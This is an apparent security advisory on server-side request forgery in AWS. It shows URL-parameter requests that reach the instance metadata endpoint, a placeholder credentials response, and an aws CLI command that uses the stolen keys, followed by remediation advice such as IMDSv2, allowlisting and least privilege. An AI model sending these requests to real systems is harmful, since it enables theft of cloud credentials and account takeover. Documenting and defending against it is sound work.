Server-Side Request Forgery (SSRF) – AWS Credentials Theft

Description

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server to make unauthorized HTTP requests to internal or external services. When SSRF is exploited in cloud environments like AWS, attackers can query internal metadata endpoints to steal sensitive credentials, such as IAM role access keys, allowing them to gain control over AWS resources.

AWS instances use the Instance Metadata Service (IMDS), which provides temporary security credentials to applications running inside EC2 instances. If an application vulnerable to SSRF can make internal HTTP requests, attackers can access this metadata and extract AWS credentials, leading to privilege escalation, data exfiltration, and full account compromise.

Examples

Exploiting SSRF to Access AWS Metadata

A vulnerable web application allows users to fetch remote URLs by supplying an arbitrary URL parameter:

GET /fetch?url=https://example.com

If the application does not properly validate user-supplied URLs, an attacker can redirect the request to AWS IMDS:

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Attack Steps

  1. The attacker sends a request to fetch data from AWS's metadata service (169.254.169.254).
  2. The response exposes available IAM roles assigned to the EC2 instance.
  3. The attacker then retrieves temporary AWS access keys:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role
  1. The response returns credentials:
{
  "AccessKeyId": "AKIAEXAMPLE123",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "FQoGZXIvYXdzEXAMPLE...",
  "Expiration": "2025-03-31T12:00:00Z"
}
  1. The attacker now has valid AWS credentials and can:

  • List and steal S3 buckets:

    aws s3 ls --access-key AKIAEXAMPLE123 --secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY --token FQoGZXIvYXdzEXAMPLE...

  • Create or delete EC2 instances, modify IAM roles, or exfiltrate data.

Remediation

  1. Block Requests to AWS Metadata Service

    • Implement firewall rules or network policies to prevent access to 169.254.169.254 from the application.
    • In AWS, disable IMDS v1 (which is vulnerable to SSRF) and require IMDSv2, which enforces authentication:
    aws ec2 modify-instance-metadata-options --instance-id i-1234567890abcdef0 --http-endpoint enabled --http-tokens required

  2. Validate and Restrict Outbound Requests

    • Whitelist only trusted domains for user-supplied URLs.
    • Reject requests containing IP addresses, localhost, or internal services.
    • Example regex to filter external URLs:
    ^(https?:\/\/(www\.)?trusted-domain\.com\/.*)$

  3. Use IAM Role Restrictions

    • Assign least privilege IAM roles to EC2 instances to limit access to AWS resources.
    • Block sensitive actions (e.g., s3:ListBuckets, iam:PassRole) in IAM policies.

  4. Enforce Network Segmentation

    • Use VPC Security Groups and NACLs (Network ACLs) to restrict instance communication with internal services.
    • Ensure EC2 instances cannot make arbitrary requests to internal services.